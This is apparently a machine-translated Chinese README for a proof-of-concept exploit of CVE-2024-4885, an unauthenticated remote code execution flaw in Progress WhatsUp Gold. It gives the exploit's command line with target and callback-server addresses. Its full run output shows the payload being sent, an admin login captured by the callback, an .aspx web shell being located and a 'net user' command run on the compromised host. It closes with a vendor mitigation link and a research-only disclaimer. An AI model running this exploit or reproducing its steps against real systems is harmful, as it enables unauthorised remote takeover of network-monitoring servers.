CVE-2024-4885 進展 WhatsUp Gold GetFileWithoutZip 未經驗證的遠端程式碼執行 (CVE-2024-4885) 的 PoC 
該漏洞的根本原因分析可以在我的部落格上找到:https://summoning.team/blog/progress-whatsup-gold-rce-cve-2024-4885/
python3 CVE-2024-4885.py -t http://192.168.0.231:9642 -s 192.168.0.181:1337 -f hax.aspx _______ _ _ _______ _______ _____ __ _ _____ __ _ ______ _______ _______ _______ _______ |______ | | | | | | | | | | | | | | | | ____ | |______ |_____| | | | ______| |_____| | | | | | | |_____| | _| __|__ | _| |_____| . | |______ | | | | | (*) Progress WhatsUp Gold GetFileWithoutZip Unauthenticated Remote Code Execution (CVE-2024-4885) (*) Exploit by Sina Kheirkhah (@SinSinology) of SummoningTeam (@SummoningTeam) (*) Technical details: https://summoning.team/blog/progress-whatsup-gold-rce-cve-2024-4885/ (^_^) Prepare for the Pwnage (^_^) (+) Sending payload to http://192.168.0.231:9642/NmConsole/ReportService.asmx (*) Callback server listening on http://192.168.0.181:1337 (+) Payload sent successfully (*) Checking if target is using HTTPS or HTTP https://192.168.0.231/NmConsole/ (*) Target host: https://192.168.0.231 (*) spraying... https://192.168.0.231/NmConsole/Data/ExportedReports/a70d6fde3f82e3b9_2024-07-06_23-31-24.aspx (+) Callback received 192.168.0.231 - - [06/Jul/2024 23:31:30] "GET /Session/Login/?sUsername=admin&sPassword=3,0,0,0,16,0,0,0 HTTP/1.1" 200 - 192.168.0.231 - - [06/Jul/2024 23:31:30] "PUT /api/core/render HTTP/1.1" 200 - (*) spraying... https://192.168.0.231/NmConsole/Data/ExportedReports/a70d6fde3f82e3b9_2024-07-06_23-31-25.aspx (*) spraying... https://192.168.0.231/NmConsole/Data/ExportedReports/a70d6fde3f82e3b9_2024-07-06_23-31-26.aspx (*) spraying... https://192.168.0.231/NmConsole/Data/ExportedReports/a70d6fde3f82e3b9_2024-07-06_23-31-27.aspx (*) spraying... https://192.168.0.231/NmConsole/Data/ExportedReports/a70d6fde3f82e3b9_2024-07-06_23-31-28.aspx (*) spraying... https://192.168.0.231/NmConsole/Data/ExportedReports/a70d6fde3f82e3b9_2024-07-06_23-31-29.aspx (*) spraying... https://192.168.0.231/NmConsole/Data/ExportedReports/a70d6fde3f82e3b9_2024-07-06_23-31-30.aspx (*) spraying... https://192.168.0.231/NmConsole/Data/ExportedReports/a70d6fde3f82e3b9_2024-07-06_23-31-31.aspx (*) spraying... https://192.168.0.231/NmConsole/Data/ExportedReports/a70d6fde3f82e3b9_2024-07-06_23-31-32.aspx (*) spraying... https://192.168.0.231/NmConsole/Data/ExportedReports/a70d6fde3f82e3b9_2024-07-06_23-31-33.aspx (+) Web shell found at -> https://192.168.0.231/NmConsole/Data/ExportedReports/a70d6fde3f82e3b9_2024-07-06_23-31-33.aspx Shell> net user User accounts for ------------------------------------------------------------------------------- Administrator debugger DefaultAccount Guest WDAGUtilityAccount The command completed with one or more errors. Shell>
更新至最新版本或按照進度建議中的說明進行緩解
https://community.progress.com/s/article/WhatsUp-Gold-Security-Bulletin-June-2024
罪漢學
召喚小隊
該軟體純粹是為了學術研究和開發有效防禦技術的目的而創建的,除非明確授權,否則不得用於攻擊系統。專案維護者對軟體的濫用不承擔任何責任。負責任地使用。
